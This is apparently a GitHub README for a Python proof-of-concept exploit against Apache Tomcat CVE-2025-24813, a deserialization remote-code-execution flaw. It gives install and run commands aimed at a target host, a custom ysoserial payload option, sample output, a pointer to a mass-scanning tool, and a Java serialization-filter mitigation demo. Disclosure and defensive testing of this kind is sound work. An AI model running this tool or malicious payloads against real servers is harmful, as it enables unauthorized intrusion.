Mattb709/CVE-2025-24813-PoC-Apache-Tomcat-RCE

Apache Tomcat CVE-2025-24813 Proof of Concept (PoC)

A proof-of-concept exploit for the Apache Tomcat deserialization vulnerability (CVE-2025-24813). This tool demonstrates how attackers could exploit insecure deserialization in Tomcat's session management.

WARNING: This tool is for authorized security testing and educational purposes only. Unauthorized use against systems you don't own is illegal.

Features

  • Supports both default (safe) and custom payloads
  • SSL/TLS support (with optional verification bypass)
  • Color-coded output for better visibility
  • Interactive payload selection
  • Configurable timeouts

Requirements

  • Python 3.x
  • Required packages (installed via `pip install -r requirements.txt`, see Installation):
    • requests
    • colorama

Installation

git clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt

Usage

Basic usage:

python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080

Advanced options:

python CVE-2025-24813-PoC.py \
  -t 10.0.0.1 \
  -p 8443 \
  --protocol https \
  --no-verify \
  --timeout 15

Command Line Arguments

Argument        Description                                   Required
-t, --target    Target IP address                             Yes
-p, --port      Target port number                            Yes
--protocol      http or https (default: http)                 No
--no-verify     Disable SSL certificate verification          No
--timeout       Request timeout in seconds (default: 10)      No

Payload Options

  1. Default Payload: Harmless serialized object (safe for detection)
  2. Custom Payload: Hex-encoded payload from tools like ysoserial

Example Output

[*] Apache Tomcat CVE-2025-24813 Exploit PoC 
[!] WARNING: For authorized testing only. Unauthorized use is illegal.

[*] Targeting http://192.168.1.100:8080

[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.

[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!

Related Tools

For mass scanning vulnerable systems:
🔍 CVE-2025-24813-Scanner - Bulk detection tool for vulnerable Tomcat hosts

Mitigation

If you're affected by this vulnerability:

  1. Upgrade to the latest patched version of Apache Tomcat
  2. Consider using a serialization filter
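The second mitigation is easiest to reason about with a concrete run. The Java program below is an added example, not code from this repository or from Apache Tomcat: it shows what a JDK serialization filter (Java 9+, `java.io.ObjectInputFilter`) does when an ObjectInputStream meets a class that is not on the allowlist. The class name `SessionNote` and the allowlist pattern are illustrative choices for the demonstration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.List;

public class SerialFilterDemo {

    // Allowlist pattern (illustrative): accept classes from the java.base module,
    // reject everything else. The trailing "!*" turns "not matched" into REJECTED;
    // without it, unmatched classes are UNDECIDED and deserialization proceeds.
    static final ObjectInputFilter ALLOWLIST =
            ObjectInputFilter.Config.createFilter("java.base/*;!*");

    // Serialize any object to bytes (stands in for a persisted session file).
    static byte[] serialize(Object value) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(value);
        }
        return bos.toByteArray();
    }

    // Deserialize with the filter installed on the stream. A rejected class
    // surfaces as InvalidClassException before its readObject logic ever runs.
    static Object deserializeFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(ALLOWLIST);
            return ois.readObject();
        }
    }

    // Hypothetical application class: it lives outside java.base, so the
    // allowlist above does not cover it.
    static class SessionNote implements Serializable {
        private static final long serialVersionUID = 1L;
        String text = "hello";
    }

    public static void main(String[] args) throws Exception {
        // ArrayList and String are java.base classes: accepted by the filter.
        Object accepted = deserializeFiltered(serialize(new ArrayList<>(List.of("a", "b"))));
        System.out.println("accepted: " + accepted);

        // SessionNote is not covered by the allowlist: rejected by the filter.
        try {
            deserializeFiltered(serialize(new SessionNote()));
            System.out.println("unexpected: SessionNote was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern syntax can be applied JVM-wide, with no code change, through the `jdk.serialFilter` system property (for Tomcat, typically via the JVM options it is started with); a filter scoped to the exact classes a deployment legitimately stores in sessions is the goal, and the `java.base/*` allowlist here is only the starting point for the demonstration.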

Legal Disclaimer

This software is provided under the MIT License. The author is not responsible for any misuse of this tool. Always obtain proper authorization before testing systems.

License

MIT License - See LICENSE file for details.

About

A Python proof-of-concept exploit for CVE-2025-24813 - Unauthenticated RCE in Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2) via malicious Java object deserialization. Includes safe detection mode and custom payload support.
